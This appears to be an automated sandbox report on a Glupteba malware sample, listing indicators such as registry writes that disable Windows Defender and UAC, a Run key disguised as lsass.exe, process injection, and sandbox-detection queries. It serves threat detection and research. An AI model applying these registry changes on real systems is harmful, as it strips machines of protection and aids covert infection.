glupteba | 1cd649ea4273fd977b6a350bfe8f3b62f1d0aee1408b9966aa3d6ad39ba5af6a

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	qhofWxi42CEklSr64GyF95Yy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	qhofWxi42CEklSr64GyF95Yy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cmd.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fbvPOts0iekMatmN372ckwox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fbvPOts0iekMatmN372ckwox.exe

Loads dropped DLL 6 IoCs

pid	Process
3472	rundll32.exe
6008	rundll32.exe
5668	rundll32.exe
5668	rundll32.exe
4480	RUNDLL32.EXE
4480	RUNDLL32.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Themida packer 8 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral6/files/0x000200000002b1dd-251.dat	themida
behavioral6/files/0x000200000002b1e0-247.dat	themida
behavioral6/files/0x000200000002b1d5-242.dat	themida
behavioral6/files/0x000200000002b1dd-204.dat	themida
behavioral6/files/0x000200000002b1e0-205.dat	themida
behavioral6/files/0x000200000002b1d5-172.dat	themida
behavioral6/memory/1648-312-0x0000000000AD0000-0x0000000000AD1000-memory.dmp	themida
behavioral6/memory/908-313-0x0000000000BD0000-0x0000000000BD1000-memory.dmp	themida

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions	luVc3NOWeOV05DUtbvpIs_eO.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection	luVc3NOWeOV05DUtbvpIs_eO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	luVc3NOWeOV05DUtbvpIs_eO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0"	luVc3NOWeOV05DUtbvpIs_eO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0"	luVc3NOWeOV05DUtbvpIs_eO.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	luVc3NOWeOV05DUtbvpIs_eO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\luVc3NOWeOV05DUtbvpIs_eO.exe = "0"	luVc3NOWeOV05DUtbvpIs_eO.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet	luVc3NOWeOV05DUtbvpIs_eO.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	luVc3NOWeOV05DUtbvpIs_eO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	luVc3NOWeOV05DUtbvpIs_eO.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run	227D.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"	227D.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fbvPOts0iekMatmN372ckwox.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	qhofWxi42CEklSr64GyF95Yy.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	luVc3NOWeOV05DUtbvpIs_eO.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	luVc3NOWeOV05DUtbvpIs_eO.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md8_8eus.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	ipinfo.io
29	ipinfo.io
55	ip-api.com
100	ipinfo.io
149	geoiptool.com

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
908	fbvPOts0iekMatmN372ckwox.exe
1648	qhofWxi42CEklSr64GyF95Yy.exe
1960	cmd.exe

Suspicious use of SetThreadContext 64 IoCs

description	pid	Process	procid_target
PID 1472 set thread context of 5196	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	147
PID 4820 set thread context of 5516	4820	Ou3tPfureT.exe	152
PID 2408 set thread context of 5420	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	154
PID 812 set thread context of 5616	812	R_0TKJ3kogQbrcooaOq51koq.exe	156
PID 1472 set thread context of 5672	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	155
PID 812 set thread context of 1240	812	R_0TKJ3kogQbrcooaOq51koq.exe	161
PID 1472 set thread context of 5256	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	163
PID 2408 set thread context of 4816	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	169
PID 1472 set thread context of 4464	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	181
PID 812 set thread context of 5400	812	R_0TKJ3kogQbrcooaOq51koq.exe	175
PID 2408 set thread context of 2832	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	177
PID 1472 set thread context of 5328	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	189
PID 812 set thread context of 5904	812	R_0TKJ3kogQbrcooaOq51koq.exe	188
PID 2408 set thread context of 5888	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	185
PID 1844 set thread context of 1636	1844	Process not Found	201
PID 1472 set thread context of 4648	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	205
PID 2408 set thread context of 1436	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	191
PID 1472 set thread context of 748	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	198
PID 2408 set thread context of 2568	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	207
PID 1716 set thread context of 5820	1716	8W2fTZIx35tdQbLDIrRV5yIU.exe	463
PID 812 set thread context of 2680	812	R_0TKJ3kogQbrcooaOq51koq.exe	211
PID 2540 set thread context of 3988	2540	luVc3NOWeOV05DUtbvpIs_eO.exe	236
PID 2408 set thread context of 2280	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	212
PID 1936 set thread context of 2220	1936	KgzcBGxYAcOqyAtT4Tl2hBuQ.exe	512
PID 812 set thread context of 5608	812	R_0TKJ3kogQbrcooaOq51koq.exe	235
PID 1472 set thread context of 3204	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	222
PID 2408 set thread context of 3028	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	224
PID 812 set thread context of 5272	812	R_0TKJ3kogQbrcooaOq51koq.exe	230
PID 1472 set thread context of 668	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	242
PID 812 set thread context of 1676	812	R_0TKJ3kogQbrcooaOq51koq.exe	245
PID 812 set thread context of 6044	812	R_0TKJ3kogQbrcooaOq51koq.exe	250
PID 1472 set thread context of 4388	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	247
PID 2408 set thread context of 5452	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	243
PID 812 set thread context of 1700	812	R_0TKJ3kogQbrcooaOq51koq.exe	248
PID 5912 set thread context of 5676	5912	R_0TKJ3kogQbrcooaOq51koq.exe	239
PID 1472 set thread context of 6312	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	261
PID 1472 set thread context of 6692	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	258
PID 812 set thread context of 6476	812	R_0TKJ3kogQbrcooaOq51koq.exe	259
PID 2592 set thread context of 6940	2592	d9LlCd5qjRdcm1JDv_1czNAg.exe	256
PID 2408 set thread context of 6412	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	251
PID 1472 set thread context of 7064	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	254
PID 812 set thread context of 2924	812	R_0TKJ3kogQbrcooaOq51koq.exe	464
PID 2408 set thread context of 5432	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	267
PID 2408 set thread context of 6704	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	276
PID 1472 set thread context of 5132	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	275
PID 2408 set thread context of 6976	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	272
PID 812 set thread context of 4396	812	R_0TKJ3kogQbrcooaOq51koq.exe	271
PID 812 set thread context of 2844	812	R_0TKJ3kogQbrcooaOq51koq.exe	279
PID 2408 set thread context of 6168	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	278
PID 1472 set thread context of 2168	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	277
PID 1472 set thread context of 6716	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	286
PID 2408 set thread context of 7008	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	925
PID 812 set thread context of 1588	812	R_0TKJ3kogQbrcooaOq51koq.exe	292
PID 1472 set thread context of 3908	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	288
PID 2408 set thread context of 1392	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	289
PID 1472 set thread context of 1604	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	298
PID 812 set thread context of 4532	812	R_0TKJ3kogQbrcooaOq51koq.exe	296
PID 2408 set thread context of 1876	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	459
PID 812 set thread context of 1060	812	R_0TKJ3kogQbrcooaOq51koq.exe	301
PID 2408 set thread context of 5764	2408	cNu42Z1UVCydZYyJC90EgaIO.exe	305
PID 1472 set thread context of 6188	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	306
PID 812 set thread context of 2988	812	R_0TKJ3kogQbrcooaOq51koq.exe	308
PID 1472 set thread context of 6588	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	309
PID 1472 set thread context of 7028	1472	xUhCEE_8ET1Pwkmoq3M7wp9n.exe	313

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Company\NewProduct\Uninstall.ini	clgl6g0HmgWHV4nOLBiRhmFX.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	WerFault.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	WerFault.exe
File created	C:\PROGRA~3\wiqjp.tmp	rundll32.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\cutm3.exe	clgl6g0HmgWHV4nOLBiRhmFX.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe	clgl6g0HmgWHV4nOLBiRhmFX.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\inst1.exe	clgl6g0HmgWHV4nOLBiRhmFX.exe
File opened for modification	C:\Program Files (x86)\Company\NewProduct\Uninstall.exe	clgl6g0HmgWHV4nOLBiRhmFX.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 56 IoCs

pid	pid_target	Process	procid_target
1272	1436	WerFault.exe	108
1420	2420	WerFault.exe	96
5320	4820	WerFault.exe	132
5896	5672	WerFault.exe	155
4856	1776	WerFault.exe	103
3896	3472	WerFault.exe	183
1080	3668	WerFault.exe	90
3292	1900	WerFault.exe	102
7032	5912	WerFault.exe	215
6244	2248	WerFault.exe	143
1864	5912	WerFault.exe	215
3044	6716	WerFault.exe	286
1176	1876	WerFault.exe	294
5720	6008	WerFault.exe	232
3940	5592	WerFault.exe	354
6400	2584	WerFault.exe	299
876	2248	WerFault.exe	316
6988	6916	WerFault.exe	329
4248	5860	WerFault.exe	399
828	8024	WerFault.exe	409
7204	7476	WerFault.exe	431
2244	2924	WerFault.exe	464
1432	8184	WerFault.exe	475
7508	7292	WerFault.exe	344
8864	3056	WerFault.exe	231
8988	8576	WerFault.exe	513
9052	4200	WerFault.exe	542
3620	1236	WerFault.exe	213
9108	4764	WerFault.exe	586
4012	4772	WerFault.exe	589
5092	5612	WerFault.exe	626
7328	584	WerFault.exe	627
3380	5180	WerFault.exe	665
5184	5412	WerFault.exe	680
9920	9268	WerFault.exe	708
8936	14532	WerFault.exe	793
10328	7456	WerFault.exe	809
10656	15136	WerFault.exe	807
10692	16224	WerFault.exe	865
7800	14788	WerFault.exe	976
11012	5224	WerFault.exe	1003
9692	5056	WerFault.exe	1015
12564	2856	WerFault.exe	1023
13424	132	WerFault.exe	1026
10224	9084	WerFault.exe	1029
12232	13612	WerFault.exe	1092
14576	14800	WerFault.exe	1139
4052	5312	Process not Found	1162
15764	13300	Process not Found	1198
1872	11360	Process not Found	1222
11528	14380	Process not Found	1241
13084	9912	Process not Found	1252
10644	5184	Process not Found	1307
18572	1684	Process not Found	34
16024	22296	Process not Found	1368
25564	17188	Process not Found	1393

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gfben_qsBhcpl2Qy7JmD_scc.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gfben_qsBhcpl2Qy7JmD_scc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Gfben_qsBhcpl2Qy7JmD_scc.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Status	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	R_0TKJ3kogQbrcooaOq51koq.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	cNu42Z1UVCydZYyJC90EgaIO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	cNu42Z1UVCydZYyJC90EgaIO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	R_0TKJ3kogQbrcooaOq51koq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value enumerated	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\VendorIdentifier	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	cNu42Z1UVCydZYyJC90EgaIO.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\Update Status	RUNDLL32.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	R_0TKJ3kogQbrcooaOq51koq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5080	schtasks.exe
4980	schtasks.exe

Enumerates system info in registry 2 TTPs 36 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	R_0TKJ3kogQbrcooaOq51koq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	cNu42Z1UVCydZYyJC90EgaIO.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	cNu42Z1UVCydZYyJC90EgaIO.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	R_0TKJ3kogQbrcooaOq51koq.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	Process not Found
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	Process not Found
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5852	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3480	Setup (9).exe
3480	Setup (9).exe
5284	AdvancedRun.exe
5284	AdvancedRun.exe
1420	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
1420	xUhCEE_8ET1Pwkmoq3M7wp9n.exe
5284	AdvancedRun.exe
5284	AdvancedRun.exe
1272	WerFault.exe
1272	WerFault.exe
5896	WerFault.exe
5896	WerFault.exe
5320	WerFault.exe
5320	WerFault.exe
1636	Gfben_qsBhcpl2Qy7JmD_scc.exe
